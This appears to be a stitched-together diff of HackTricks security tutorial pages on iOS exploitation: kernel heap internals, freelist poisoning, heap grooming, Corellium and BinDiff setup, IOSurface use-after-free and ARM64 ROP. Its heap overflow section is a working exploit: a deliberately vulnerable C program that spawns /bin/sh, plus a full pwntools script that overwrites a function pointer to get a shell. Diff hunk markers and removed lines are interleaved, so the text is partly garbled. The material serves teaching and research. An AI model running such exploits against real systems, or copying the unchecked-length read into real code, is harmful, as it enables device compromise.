| `default.kalloc.64` | 64 bytes | IPC messages, tiny kernel buffers. |
| `default.kalloc.128` | 128 bytes | Medium objects like parts of `OSObject`. |
| `default.kalloc.256` | 256 bytes | Larger IPC messages, arrays, device structures. |
| … | … | … |
| `default.kalloc.1280`| 1280 bytes | Large structures, IOSurface/graphics metadata. |

**How it worked:**

- Each allocation request gets **rounded up** to the nearest zone size.
  (E.g., a 50-byte request lands in the `kalloc.64` zone).
- Memory in each zone was kept in a **free list** — chunks freed by the kernel went back into that zone.
- If you overflowed a 64-byte buffer, you'd overwrite the **next object in the same zone**.

This is why **heap spraying / feng shui** was so effective: you could predict object neighbors by spraying allocations of the same size class (a rounding sketch is shown below).

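A minimal sketch of that size-class rounding (illustrative only, not the real XNU code; the `kalloc_zone_for` helper and the size list are assumptions based on the table above):

```c
// Illustrative only: map a requested size to the old-style kalloc zone that
// would service it, by rounding up to one of the element sizes listed above.
#include <stddef.h>

static const size_t kalloc_zone_sizes[] = { 16, 32, 64, 128, 256, 512, 1024, 1280 };

static size_t kalloc_zone_for(size_t request) {
    for (size_t i = 0; i < sizeof(kalloc_zone_sizes) / sizeof(kalloc_zone_sizes[0]); i++) {
        if (request <= kalloc_zone_sizes[i])
            return kalloc_zone_sizes[i];   // e.g. a 50-byte request -> kalloc.64
    }
    return 0; // larger requests were handled by bigger zones / kmem
}
```
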
### The freelist

Inside each kalloc zone, freed objects weren't returned directly to the system — they went into a freelist, a linked list of available chunks.

- When a chunk was freed, the kernel wrote a pointer at the start of that chunk → the address of the next free chunk in the same zone.
- The zone kept a HEAD pointer to the first free chunk.
- Allocation always used the current HEAD:
  1. Pop HEAD (return that memory to the caller).
  2. Update HEAD = HEAD->next (stored in the freed chunk's header).
- Freeing pushed chunks back:
  - `freed_chunk->next = HEAD`
  - `HEAD = freed_chunk`

So the freelist was just a linked list built inside the freed memory itself (a minimal C model is sketched after the diagram).

Normal state:

```
Zone page (64-byte chunks for example):
[ A ] [ F ] [ F ] [ A ] [ F ] [ A ] [ F ]

Freelist view:
HEAD ──► [ F ] ──► [ F ] ──► [ F ] ──► [ F ] ──► NULL
(next ptrs stored at start of freed chunks)
```
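
A minimal C model of that behaviour (a simplification for illustration; the real `zalloc` had more metadata and checks, and `zone_head`, `zone_alloc` and `zone_free` are invented names):

```c
// Simplified model of the old zone freelist: the first pointer-sized field of a
// freed chunk stores the address of the next free chunk in the same zone.
typedef struct free_chunk {
    struct free_chunk *next;   // overlaps the first 8 bytes of the freed element
} free_chunk_t;

static free_chunk_t *zone_head = NULL;   // HEAD of the freelist for one zone

static void zone_free(void *chunk) {     // push: freed_chunk->next = HEAD; HEAD = freed_chunk
    free_chunk_t *c = (free_chunk_t *)chunk;
    c->next = zone_head;
    zone_head = c;
}

static void *zone_alloc(void) {          // pop: return HEAD; HEAD = HEAD->next
    free_chunk_t *c = zone_head;
    if (c != NULL)
        zone_head = c->next;
    return c;
}
```
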
### Exploiting the freelist

Because the first 8 bytes of a free chunk = freelist pointer, an attacker could corrupt it:

1. **Heap overflow** into an adjacent freed chunk → overwrite its "next" pointer.
2. **Use-after-free** write into a freed object → overwrite its "next" pointer.

Then, on the next allocation of that size:

- The allocator pops the corrupted chunk.
- Follows the attacker-supplied "next" pointer.
- Returns a pointer to arbitrary memory, enabling fake object primitives or targeted overwrite.

Visual example of freelist poisoning:

```
Before corruption:
HEAD ──► [ F1 ] ──► [ F2 ] ──► [ F3 ] ──► NULL

After attacker overwrite of F1->next:
HEAD ──► [ F1 ]
          (next) ──► 0xDEAD_BEEF_CAFE_BABE (attacker-chosen)

Next alloc of this zone → kernel hands out memory at attacker-controlled address.
```

This freelist design made exploitation highly effective pre-hardening: predictable neighbors from heap sprays, raw pointer freelist links, and no type separation allowed attackers to escalate UAF/overflow bugs into arbitrary kernel memory control (a toy simulation is sketched below).

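Reusing the toy model from the previous sketch, freelist poisoning is just a write over a freed chunk's `next` field; the second allocation then returns an attacker-chosen address (userland simulation, illustrative only):

```c
// Toy demonstration of freelist poisoning using the model above (userland
// simulation, not kernel code): corrupting F1->next makes the second
// allocation return an arbitrary, attacker-chosen address.
#include <stdint.h>

void poison_demo(void *victim_addr) {
    uint64_t chunk_a[8], chunk_f1[8];    // stand-ins for two adjacent zone elements

    zone_free(chunk_f1);                 // F1 goes on the freelist: HEAD -> F1 -> NULL

    // Overflow from the adjacent object A into F1's header, overwriting "next".
    ((free_chunk_t *)chunk_f1)->next = (free_chunk_t *)victim_addr;

    void *p1 = zone_alloc();             // returns F1
    void *p2 = zone_alloc();             // returns victim_addr -> fake object / targeted overwrite
    (void)p1; (void)p2; (void)chunk_a;
}
```
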
### Heap Grooming / Feng Shui

The goal of heap grooming is to **shape the heap layout** so that when an attacker triggers an overflow or use-after-free, the target (victim) object sits right next to an attacker-controlled object.\
That way, when memory corruption happens, the attacker can reliably overwrite the victim object with controlled data.

**Steps:**

1. Spray allocations (fill the holes)
   - Over time, the kernel heap gets fragmented: some zones have holes where old objects were freed.
   - The attacker first makes lots of dummy allocations to fill these gaps, so the heap becomes "packed" and predictable.

2. Force new pages
   - Once the holes are filled, the next allocations must come from new pages added to the zone.
   - Fresh pages mean objects will be clustered together, not scattered across old fragmented memory.
   - This gives the attacker much better control of neighbors.

3. Place attacker objects
   - The attacker now sprays again, creating lots of attacker-controlled objects in those new pages.
   - These objects are predictable in size and placement (since they all belong to the same zone).

4. Free a controlled object (make a gap)
   - The attacker deliberately frees one of their own objects.
   - This creates a "hole" in the heap, which the allocator will later reuse for the next allocation of that size.

5. Victim object lands in the hole
   - The attacker triggers the kernel to allocate the victim object (the one they want to corrupt).
   - Since the hole is the first available slot in the freelist, the victim is placed exactly where the attacker freed their object.

6. Overflow / UAF into victim
   - Now the attacker has attacker-controlled objects around the victim.
   - By overflowing from one of their own objects (or reusing a freed one), they can reliably overwrite the victim's memory fields with chosen values.

**Why it works** (see the sketch after this list):

- Zone allocator predictability: allocations of the same size always come from the same zone.
- Freelist behavior: new allocations reuse the most recently freed chunk first.
- Heap sprays: attacker fills memory with predictable content and controls layout.
- End result: attacker controls where the victim object lands and what data sits next to it.

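A minimal userland simulation of this allocate/free/reclaim sequence (standard `malloc`/`free` stand in for the kernel-reachable spray primitives, and `victim_alloc` is a hypothetical placeholder for the kernel allocating the object to corrupt):

```c
// Userland simulation of the grooming sequence; malloc/free stand in for the
// real spray primitives and victim_alloc for the kernel-side victim allocation.
#include <stdlib.h>
#include <string.h>

#define SPRAY_COUNT 256
#define ELEM_SZ     64          // the targeted size class

static void *victim;
static void victim_alloc(void) { victim = malloc(ELEM_SZ); }   // placeholder

void groom_demo(void) {
    void *spray[SPRAY_COUNT];

    // 1-3) Fill existing holes and force fresh, densely packed pages.
    for (int i = 0; i < SPRAY_COUNT; i++)
        spray[i] = malloc(ELEM_SZ);

    // 4) Punch a hole surrounded by attacker-controlled objects.
    free(spray[SPRAY_COUNT / 2]);
    spray[SPRAY_COUNT / 2] = NULL;

    // 5) The next allocation of this size class tends to reuse the hole.
    victim_alloc();

    // 6) "Overflow" from the neighbouring attacker object into the victim
    //    (here only a write into our own buffer, to illustrate the adjacency idea).
    memset(spray[SPRAY_COUNT / 2 - 1], 'A', ELEM_SZ);
}
```
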
---

## Modern Kernel Heap (iOS 15+/A12+ SoCs)

Apple hardened the allocator and made **heap grooming much harder**:

### 1. From Classic kalloc to kalloc_type

- **Before**: a single `kalloc.<size>` zone existed for each size class (16, 32, 64, … 1280, etc.). Any object of that size was placed there → attacker objects could sit next to privileged kernel objects.
- **Now**:
  - Kernel objects are allocated from **typed zones** (`kalloc_type`).
  - Each type of object (e.g., `ipc_port_t`, `task_t`, `OSString`, `OSData`) has its own dedicated zone, even if they're the same size.
  - The mapping between object type ↔ zone is generated from the **kalloc_type system** at compile time.

An attacker can no longer guarantee that controlled data (`OSData`) ends up adjacent to sensitive kernel objects (`task_t`) of the same size.

### 2. Slabs and Per-CPU Caches

- The heap is divided into **slabs** (pages of memory carved into fixed-size chunks for that zone).
- Each zone has a **per-CPU cache** to reduce contention.
- Allocation path:
  1. Try per-CPU cache.
  2. If empty, pull from the global freelist.
  3. If freelist is empty, allocate a new slab (one or more pages).
- **Benefit**: This decentralization makes heap sprays less deterministic, since allocations may be satisfied from different CPUs' caches.

### 3. Randomization inside zones

- Within a zone, freed elements are not handed back in simple FIFO/LIFO order.
- Modern XNU uses **encoded freelist pointers** (safe-linking like Linux, introduced ~iOS 14).
- Each freelist pointer is **XOR-encoded** with a per-zone secret cookie (see the sketch below).
- This prevents attackers from forging a fake freelist pointer if they gain a write primitive.
- Some allocations are **randomized in their placement within a slab**, so spraying doesn't guarantee adjacency.

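A minimal sketch of the encoding idea (illustrative; not the exact XNU scheme, field layout or cookie derivation):

```c
// Illustrative safe-linking-style encoding: the stored "next" value is only
// useful if you know the per-zone secret, so a forged raw pointer written by an
// attacker no longer decodes to a valid freelist link.
#include <stdint.h>

typedef struct zone {
    uintptr_t secret;                        // per-zone cookie, generated at zone creation
} zone_t;

static uintptr_t encode_next(zone_t *z, uintptr_t next_ptr) {
    return next_ptr ^ z->secret;             // what gets written into the freed chunk
}

static uintptr_t decode_next(zone_t *z, uintptr_t stored) {
    return stored ^ z->secret;               // what the allocator recovers on pop
}
```
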
### 4. Guarded Allocations

- Certain critical kernel objects (e.g., credentials, task structures) are allocated in **guarded zones**.
- These zones insert **guard pages** (unmapped memory) between slabs or use **redzones** around objects.
- Any overflow into the guard page triggers a fault → immediate panic instead of silent corruption.

### 5. Page Protection Layer (PPL) and SPTM

- Even if you control a freed object, you can't modify all of kernel memory:
  - **PPL (Page Protection Layer)** enforces that certain regions (e.g., code signing data, entitlements) are **read-only** even to the kernel itself.
  - On **A15/M2+ devices**, this role is replaced/enhanced by **SPTM (Secure Page Table Monitor)** + **TXM (Trusted Execution Monitor)**.
- These hardware-enforced layers mean attackers can't escalate from a single heap corruption to arbitrary patching of critical security structures.

### 6. Large Allocations

- Not all allocations go through `kalloc_type`.
- Very large requests (above ~16KB) bypass typed zones and are served directly from **kernel VM (kmem)** via page allocations.
- These are less predictable, but also less exploitable, since they don't share slabs with other objects.

### 7. Allocation Patterns Attackers Target

Even with these protections, attackers still look for:

- **Reference count objects**: if you can tamper with retain/release counters, you may cause use-after-free.
- **Objects with function pointers (vtables)**: corrupting one still yields control flow.
- **Shared memory objects (IOSurface, Mach ports)**: these are still attack targets because they bridge user ↔ kernel.

But — unlike before — you can't just spray `OSData` and expect it to neighbor a `task_t`. You need **type-specific bugs** or **info leaks** to succeed.

### Example: Allocation Flow in Modern Heap

Suppose userspace calls into IOKit to allocate an `OSData` object:

1. **Type lookup** → `OSData` maps to `kalloc_type_osdata` zone (size 64 bytes).
2. Check per-CPU cache for free elements.
   - If found → return one.
   - If empty → go to global freelist.
   - If freelist empty → allocate a new slab (page of 4KB → 64 chunks of 64 bytes).
3. Return chunk to caller.

**Freelist pointer protection**:

- Each freed chunk stores the address of the next free chunk, but encoded with a secret key.
- Overwriting that field with attacker data won't work unless you know the key.

## Comparison Table

| Feature | **Old Heap (Pre-iOS 15)** | **Modern Heap (iOS 15+ / A12+)** |
|---------------------------------|------------------------------------------------------|---------------------------------------------------|
| Allocation granularity | Fixed size buckets (`kalloc.16`, `kalloc.32`, etc.) | Size + **type-based buckets** (`kalloc_type`) |
| Placement predictability | High (same-size objects side by side) | Low (same-type grouping + randomness) |
| Freelist management | Raw pointers in freed chunks (easy to corrupt) | **Encoded pointers** (safe-linking style) |
| Adjacent object control | Easy via sprays/frees (feng shui predictable) | Hard — typed zones separate attacker objects |
| Kernel data/code protections | Few hardware protections | **PPL / SPTM** protect page tables & code pages |
| Exploit reliability | High with heap sprays | Much lower, requires logic bugs or info leaks |

## (Old) Physical Use-After-Free via IOSurface

{{#ref}}
ios-physical-uaf-iosurface.md
{{#endref}}

---

## Ghidra Install BinDiff

Download the BinDiff DMG from [https://www.zynamics.com/bindiff/manual](https://www.zynamics.com/bindiff/manual) and install it.

Open Ghidra with `ghidraRun` and go to `File` --> `Install Extensions`, press the add button, select the path `/Applications/BinDiff/Extra/Ghidra/BinExport`, click OK and install it even if there is a version mismatch.

### Using BinDiff with Kernel versions

1. Go to [https://ipsw.me/](https://ipsw.me/) and download the iOS versions you want to diff. These will be `.ipsw` files.
2. Decompress until you get the binary kernelcache from both `.ipsw` files. You have information on how to do this in:

{{#ref}}
../../macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md
{{#endref}}

3. Open Ghidra with `ghidraRun`, create a new project and load the kernelcaches.
4. Open each kernelcache so they are automatically analyzed by Ghidra.
5. Then, in the project window of Ghidra, right click each kernelcache, select `Export`, select the format `Binary BinExport (v2) for BinDiff` and export them.
6. Open BinDiff, create a new workspace and add a new diff, indicating as primary file the kernelcache that contains the vulnerability and as secondary file the patched kernelcache.

---

## Finding the right XNU version

If you want to check for vulnerabilities in a specific version of iOS, you can check which XNU release that iOS version uses at [https://www.theiphonewiki.com/wiki/kernel](https://www.theiphonewiki.com/wiki/kernel).

For example, the versions `15.1 RC`, `15.1` and `15.1.1` use `Darwin Kernel Version 21.1.0: Wed Oct 13 19:14:48 PDT 2021; root:xnu-8019.43.1~1/RELEASE_ARM64_T8006`.


{{#include ../../banners/hacktricks-training.md}}

# iOS How to Connect to Corellium

{{#include ../../banners/hacktricks-training.md}}

## **Prereqs**

- A Corellium iOS VM (jailbroken or not). In this guide we assume you have access to Corellium.
- Local tools: **ssh/scp**.
- (Optional) **SSH keys** added to your Corellium project for passwordless logins.


## **Connect to the iPhone VM from localhost**

### A) **Quick Connect (no VPN)**

0) Add your SSH key in **`/admin/projects`** (recommended).
1) Open the device page → **Connect**
2) **Copy the Quick Connect SSH command** shown by Corellium and paste it in your terminal.
3) Enter the password or use your key (recommended).

### B) **VPN → direct SSH**

0) Add your SSH key in **`/admin/projects`** (recommended).
1) Device page → **CONNECT** → **VPN** → download `.ovpn` and connect with any VPN client that supports TAP mode. (Check [https://support.corellium.com/features/connect/vpn](https://support.corellium.com/features/connect/vpn) if you have issues.)
2) SSH to the VM's **10.11.x.x** address:

```bash
ssh root@10.11.1.1
```

## **Upload a native binary & execute it**

### 2.1 **Upload**

- If Quick Connect gave you a host/port:

```bash
scp -J <domain> ./mytool root@10.11.1.1:/var/root/mytool
```

- If using VPN (10.11.x.x), no jump host is needed:

```bash
scp ./mytool root@10.11.1.1:/var/root/mytool
```

## **Upload & install an iOS app (.ipa)**

### Path A — **Web UI (fastest)**

1) Device page → **Apps** tab → **Install App** → pick your `.ipa`.
2) From the same tab you can **launch/kill/uninstall**.

### Path B — **Scripted via Corellium Agent**

1) Use the API Agent to **upload** then **install**:

```js
// Node.js (pseudo) using Corellium Agent
await agent.upload("./app.ipa", "/var/tmp/app.ipa");
await agent.install("/var/tmp/app.ipa", (progress, status) => {
  console.log(progress, status);
});
```

### Path C — **Non-jailbroken (proper signing / Sideloadly)**

- If you don't have a provisioning profile, use **Sideloadly** to re-sign with your Apple ID, or sign in Xcode.
- You can also expose the VM to Xcode using **USBFlux** (see **Extras** below).

- For quick logs/commands without SSH, use the device **Console** in the UI.

## **Extras**

- **Port-forwarding** (make the VM feel local for other tools):

```bash
# Forward local 2222 -> device 22
ssh -N -L 2222:127.0.0.1:22 root@10.11.1.1
# Now you can: scp -P 2222 file root@127.0.0.1:/var/root/
```

- **LLDB remote debugging**: use the **LLDB/GDB stub** address shown at the bottom of the device page (CONNECT → LLDB).

- **USBFlux (macOS/Linux)**: present the VM to **Xcode/Sideloadly** like a cabled device.


## **Common pitfalls**

- **Proper signing** is required on **non-jailbroken** devices; unsigned IPAs won't launch.
- **Quick Connect vs VPN**: Quick Connect is simplest; use **VPN** when you need the device on your local network (e.g., local proxies/tools).
- **No App Store** on Corellium devices; bring your own (re)signed IPAs.

{{#include ../../banners/hacktricks-training.md}}

# iOS Heap Overflow Exploitation Example

{{#include ../../banners/hacktricks-training.md}}

## Vuln Code

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

__attribute__((noinline))
static void safe_cb(void) {
    puts("[*] safe_cb() called — nothing interesting here.");
}

__attribute__((noinline))
static void win(void) {
    puts("[+] win() reached — spawning shell...");
    fflush(stdout);
    system("/bin/sh");
    exit(0);
}

typedef void (*cb_t)(void);

typedef struct {
    cb_t cb;       // <--- Your target: overwrite this with win()
    char tag[16];  // Cosmetic (helps make the chunk non-tiny)
} hook_t;

static void fatal(const char *msg) {
    perror(msg);
    exit(1);
}

int main(void) {
    // Make I/O deterministic
    setvbuf(stdout, NULL, _IONBF, 0);

    // Print address leak so exploit doesn't guess ASLR
    printf("[*] LEAK win() @ %p\n", (void*)&win);

    // 1) Allocate the overflow buffer
    size_t buf_sz = 128;
    char *buf = (char*)malloc(buf_sz);
    if (!buf) fatal("malloc buf");
    memset(buf, 'A', buf_sz);

    // 2) Allocate the hook object (likely adjacent in same magazine/size class)
    hook_t *h = (hook_t*)malloc(sizeof(hook_t));
    if (!h) fatal("malloc hook");
    h->cb = safe_cb;
    memcpy(h->tag, "HOOK-OBJ", 8);

    // A tiny bit of noise to look realistic (and to consume small leftover holes)
    void *spacers[16];
    for (int i = 0; i < 16; i++) {
        spacers[i] = malloc(64);
        if (spacers[i]) memset(spacers[i], 0xCC, 64);
    }

    puts("[*] You control a write into the 128B buffer (no bounds check).");
    puts("[*] Enter payload length (decimal), then the raw payload bytes.");

    // 3) Read attacker-chosen length and then read that many bytes → overflow
    char line[64];
    if (!fgets(line, sizeof(line), stdin)) fatal("fgets");
    unsigned long n = strtoul(line, NULL, 10);

    // BUG: no clamp to 128
    ssize_t got = read(STDIN_FILENO, buf, n);
    if (got < 0) fatal("read");
    printf("[*] Wrote %zd bytes into 128B buffer.\n", got);

    // 4) Trigger: call the hook's callback
    puts("[*] Calling h->cb() ...");
    h->cb();

    puts("[*] Done.");
    return 0;
}
```
|
||||
|
||||
Compile it with:
|
||||
|
||||
```bash
|
||||
clang -O0 -Wall -Wextra -std=c11 -o heap_groom vuln.c
|
||||
```
|
||||
|
||||
|
||||
## Exploit
|
||||
|
||||
> [!WARNING]
|
||||
> This exploit sets the env variable `MallocNanoZone=0` to disable the Nano zone. This is needed to get adjacent allocations when calling `malloc` with small sizes. Without it, the different mallocs would be served from different zones, wouldn't be adjacent, and therefore the overflow wouldn't work as expected.
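
For a quick manual check outside the exploit script, you could run the binary like this (sketch):

```bash
MallocNanoZone=0 ./heap_groom
```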
|
||||
|
||||
```python
|
||||
#!/usr/bin/env python3
|
||||
# Heap overflow exploit for macOS ARM64 CTF challenge
|
||||
#
|
||||
# Vulnerability: Buffer overflow in heap-allocated buffer allows overwriting
|
||||
# a function pointer in an adjacent heap chunk.
|
||||
#
|
||||
# Key insights:
|
||||
# 1. macOS uses different heap zones for different allocation sizes
|
||||
# 2. The NanoZone must be disabled (MallocNanoZone=0) to get predictable layout
|
||||
# 3. With spacers allocated after main chunks, the distance is 560 bytes (432 padding needed)
|
||||
#
|
||||
from pwn import *
|
||||
import re
|
||||
import sys
|
||||
import struct
|
||||
import platform
|
||||
|
||||
# Detect architecture and set context accordingly
|
||||
if platform.machine() == 'arm64' or platform.machine() == 'aarch64':
|
||||
context.clear(arch='aarch64')
|
||||
else:
|
||||
context.clear(arch='amd64')
|
||||
|
||||
BIN = './heap_groom'
|
||||
|
||||
def parse_leak(line):
|
||||
m = re.search(rb'win\(\) @ (0x[0-9a-fA-F]+)', line)
|
||||
if not m:
|
||||
log.failure("Couldn't parse leak")
|
||||
sys.exit(1)
|
||||
return int(m.group(1), 16)
|
||||
|
||||
def build_payload(win_addr, extra_pad=0):
|
||||
# We want: [128 bytes padding] + [optional padding for heap metadata] + [overwrite cb pointer]
|
||||
padding = b'A' * 128
|
||||
if extra_pad:
|
||||
padding += b'B' * extra_pad
|
||||
# Add the win address to overwrite the function pointer
|
||||
payload = padding + p64(win_addr)
|
||||
return payload
|
||||
|
||||
def main():
|
||||
# On macOS, we need to disable the Nano zone for adjacent allocations
|
||||
import os
|
||||
env = os.environ.copy()
|
||||
env['MallocNanoZone'] = '0'
|
||||
|
||||
# The correct padding with MallocNanoZone=0 is 432 bytes
|
||||
# This makes the total distance 560 bytes (128 buffer + 432 padding)
|
||||
# Try the known working value first, then alternatives in case of heap variation
|
||||
candidates = [
|
||||
432, # 560 - 128 = 432 (correct padding with spacers and NanoZone=0)
|
||||
424, # Try slightly less in case of alignment differences
|
||||
440, # Try slightly more
|
||||
416, # 16 bytes less
|
||||
448, # 16 bytes more
|
||||
0, # Direct adjacency (unlikely but worth trying)
|
||||
]
|
||||
|
||||
log.info("Starting heap overflow exploit for macOS...")
|
||||
|
||||
for extra in candidates:
|
||||
log.info(f"Trying extra_pad={extra} with MallocNanoZone=0")
|
||||
p = process(BIN, env=env)
|
||||
|
||||
# Read leak line
|
||||
leak_line = p.recvline()
|
||||
win_addr = parse_leak(leak_line)
|
||||
log.success(f"win() @ {hex(win_addr)}")
|
||||
|
||||
# Skip prompt lines
|
||||
p.recvuntil(b"Enter payload length")
|
||||
p.recvline()
|
||||
|
||||
# Build and send payload
|
||||
payload = build_payload(win_addr, extra_pad=extra)
|
||||
total_len = len(payload)
|
||||
|
||||
log.info(f"Sending {total_len} bytes (128 base + {extra} padding + 8 pointer)")
|
||||
|
||||
# Send length and payload
|
||||
p.sendline(str(total_len).encode())
|
||||
p.send(payload)
|
||||
|
||||
# Check if we overwrote the function pointer successfully
|
||||
try:
|
||||
output = p.recvuntil(b"Calling h->cb()", timeout=0.5)
|
||||
p.recvline(timeout=0.5) # Skip the "..." part
|
||||
|
||||
# Check if we hit win()
|
||||
response = p.recvline(timeout=0.5)
|
||||
if b"win() reached" in response:
|
||||
log.success(f"SUCCESS! Overwrote function pointer with extra_pad={extra}")
|
||||
log.success("Shell spawned, entering interactive mode...")
|
||||
p.interactive()
|
||||
return
|
||||
elif b"safe_cb() called" in response:
|
||||
log.info(f"Failed with extra_pad={extra}, safe_cb was called")
|
||||
else:
|
||||
log.info(f"Failed with extra_pad={extra}, unexpected response")
|
||||
except:
|
||||
log.info(f"Failed with extra_pad={extra}, likely crashed")
|
||||
|
||||
p.close()
|
||||
|
||||
log.failure("All padding attempts failed. The heap layout might be different.")
|
||||
log.info("Try running the exploit multiple times as heap layout can be probabilistic.")
|
||||
|
||||
if __name__ == '__main__':
|
||||
main()
|
||||
```
|
||||
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
@ -1,19 +1,6 @@
|
||||
# iOS Exploiting
|
||||
# iOS Physical Use-After-Free via IOSurface
|
||||
|
||||
{{#include ../banners/hacktricks-training.md}}
|
||||
|
||||
## iOS Exploit Mitigations
|
||||
|
||||
- **Code Signing** in iOS works by requiring every piece of executable code (apps, libraries, extensions, etc.) to be cryptographically signed with a certificate issued by Apple. When code is loaded, iOS verifies the digital signature against Apple’s trusted root. If the signature is invalid, missing, or modified, the OS refuses to run it. This prevents attackers from injecting malicious code into legitimate apps or running unsigned binaries, effectively stopping most exploit chains that rely on executing arbitrary or tampered code.
|
||||
- **CoreTrust** is the iOS subsystem responsible for enforcing code signing at runtime. It directly verifies signatures using Apple’s root certificate without relying on cached trust stores, meaning only binaries signed by Apple (or with valid entitlements) can execute. CoreTrust ensures that even if an attacker tampers with an app after installation, modifies system libraries, or tries to load unsigned code, the system will block execution unless the code is still properly signed. This strict enforcement closes many post-exploitation vectors that older iOS versions allowed through weaker or bypassable signature checks.
|
||||
- **Data Execution Prevention (DEP)** marks memory regions as non-executable unless they explicitly contain code. This stops attackers from injecting shellcode into data regions (like the stack or heap) and running it, forcing them to rely on more complex techniques like ROP (Return-Oriented Programming).
|
||||
- **ASLR (Address Space Layout Randomization)** randomizes the memory addresses of code, libraries, stack, and heap every time the system runs. This makes it much harder for attackers to predict where useful instructions or gadgets are, breaking many exploit chains that depend on fixed memory layouts.
|
||||
- **KASLR (Kernel ASLR)** applies the same randomization concept to the iOS kernel. By shuffling the kernel’s base address at each boot, it prevents attackers from reliably locating kernel functions or structures, raising the difficulty of kernel-level exploits that would otherwise gain full system control.
|
||||
- **Kernel Patch Protection (KPP)** continuously monitors the kernel’s code pages to ensure they haven’t been modified. If any tampering is detected—such as an exploit trying to patch kernel functions or insert malicious code—the device will immediately panic and reboot. This protection makes persistent kernel exploits far harder, as attackers can’t simply hook or patch kernel instructions without triggering a system crash.
|
||||
- **Kernel Text Readonly Region (KTRR)** is a hardware-based security feature introduced on iOS devices. It uses the CPU’s memory controller to mark the kernel’s code (text) section as permanently read-only after boot. Once locked, even the kernel itself cannot modify this memory region. This prevents attackers—and even privileged code—from patching kernel instructions at runtime, closing off a major class of exploits that relied on modifying kernel code directly.
|
||||
- **Pointer Authentication Codes (PAC)** use cryptographic signatures embedded into unused bits of pointers to verify their integrity before use. When a pointer (like a return address or function pointer) is created, the CPU signs it with a secret key; before dereferencing, the CPU checks the signature. If the pointer was tampered with, the check fails and execution stops. This prevents attackers from forging or reusing corrupted pointers in memory corruption exploits, making techniques like ROP or JOP much harder to pull off reliably.
|
||||
- **Privileged Access Never (PAN)** is a hardware feature that prevents the kernel (privileged mode) from directly accessing user-space memory unless it explicitly enables access. This stops attackers who gained kernel code execution from easily reading or writing user memory to escalate exploits or steal sensitive data. By enforcing strict separation, PAN reduces the impact of kernel exploits and blocks many common privilege-escalation techniques.
|
||||
- **Page Protection Layer (PPL)** is an iOS security mechanism that protects critical kernel-managed memory regions, especially those related to code signing and entitlements. It enforces strict write protections using the MMU (Memory Management Unit) and additional checks, ensuring that even privileged kernel code cannot arbitrarily modify sensitive pages. This prevents attackers who gain kernel-level execution from tampering with security-critical structures, making persistence and code-signing bypasses significantly harder.
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
## Physical use-after-free
|
||||
@ -80,7 +67,7 @@ A **physical use-after-free** (UAF) occurs when:
|
||||
|
||||
This means the process can access **pages of kernel memory**, which could contain sensitive data or structures, potentially allowing an attacker to **manipulate kernel memory**.
|
||||
|
||||
### Exploitation Strategy: Heap Spray
|
||||
### IOSurface Heap Spray
|
||||
|
||||
Since the attacker can’t control which specific kernel pages will be allocated to freed memory, they use a technique called **heap spray**:
|
||||
|
||||
@ -91,6 +78,13 @@ Since the attacker can’t control which specific kernel pages will be allocated
|
||||
|
||||
More info about this in [https://github.com/felix-pb/kfd/tree/main/writeups](https://github.com/felix-pb/kfd/tree/main/writeups)
|
||||
|
||||
> [!TIP]
|
||||
> Be aware that iOS 16+ (A12+) devices bring hardware mitigations (like PPL or SPTM) that make physical UAF techniques far less viable.
|
||||
> PPL enforces strict MMU protections on pages related to code signing, entitlements, and sensitive kernel data, so, even if a page gets reused, writes from userland or compromised kernel code to PPL-protected pages are blocked.
|
||||
> Secure Page Table Monitor (SPTM) extends PPL by hardening page table updates themselves. It ensures that even privileged kernel code cannot silently remap freed pages or tamper with mappings without going through secure checks.
|
||||
> There is also KTRR (Kernel Text Read-Only Region), which locks down the kernel’s code section as read-only after boot. This prevents any runtime modifications to kernel code, closing off a major attack vector that physical UAF exploits often rely on.
|
||||
> Moreover, `IOSurface` allocations are less predictable and harder to map into user-accessible regions, which makes the “magic value scanning” trick much less reliable. And `IOSurface` is now guarded by entitlements and sandbox restrictions.
|
||||
|
||||
### Step-by-Step Heap Spray Process
|
||||
|
||||
1. **Spray IOSurface Objects**: The attacker creates many IOSurface objects with a special identifier ("magic value").
|
||||
@ -226,5 +220,4 @@ void iosurface_kwrite64(uint64_t addr, uint64_t value) {
|
||||
|
||||
With these primitives, the exploit provides controlled **32-bit reads** and **64-bit writes** to kernel memory. Further jailbreak steps could involve more stable read/write primitives, which may require bypassing additional protections (e.g., PPL on newer arm64e devices).
|
||||
|
||||
|
||||
{{#include ../banners/hacktricks-training.md}}
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
@ -1,4 +1,4 @@
|
||||
# ROP - Return Oriented Programing
|
||||
# ROP & JOP
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
@ -146,18 +146,149 @@ In this example:
|
||||
> [!TIP]
|
||||
> Since **x64 uses registers for the first few arguments,** it often requires fewer gadgets than x86 for simple function calls, but finding and chaining the right gadgets can be more complex due to the increased number of registers and the larger address space, which provide both opportunities and challenges for exploit development, especially in the context of Return-Oriented Programming (ROP).
|
||||
|
||||
## ROP chain in ARM64 Example
|
||||
|
||||
### **ARM64 Basics & Calling conventions**
|
||||
|
||||
Check the following page for this information:
|
||||
## ROP chain in ARM64
|
||||
|
||||
Regarding **ARM64 Basics & Calling conventions**, check the following page for this information:
|
||||
|
||||
{{#ref}}
|
||||
../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md
|
||||
{{#endref}}
|
||||
|
||||
## Protections Against ROP
|
||||
> [!DANGER]
|
||||
> It's important to note that when jumping to a function using a ROP chain in **ARM64** you should jump to the 2nd instruction of the function (at least) to skip the prologue instruction that saves the frame and return address on the stack; otherwise you can end up in an eternal loop calling the function over and over.
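
For example, a typical ARM64 function prologue looks like this (illustrative snippet, not taken from a real binary):

```
foo:
    stp x29, x30, [sp, #-0x10]!   ; 1st instruction: saves FP/LR on the stack
    mov x29, sp                   ; jump here (foo+4) instead from the ROP chain
    ...
    ldp x29, x30, [sp], #0x10
    ret
```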
|
||||
|
||||
### Finding gadgets in system dylibs
|
||||
|
||||
The system libraries come compiled into a single file called **dyld_shared_cache_arm64**. This file contains all the system libraries in a compressed format. To download this file from the mobile device you can do:
|
||||
|
||||
```bash
|
||||
scp [-J <domain>] root@10.11.1.1:/System/Library/Caches/com.apple.dyld/dyld_shared_cache_arm64 .
|
||||
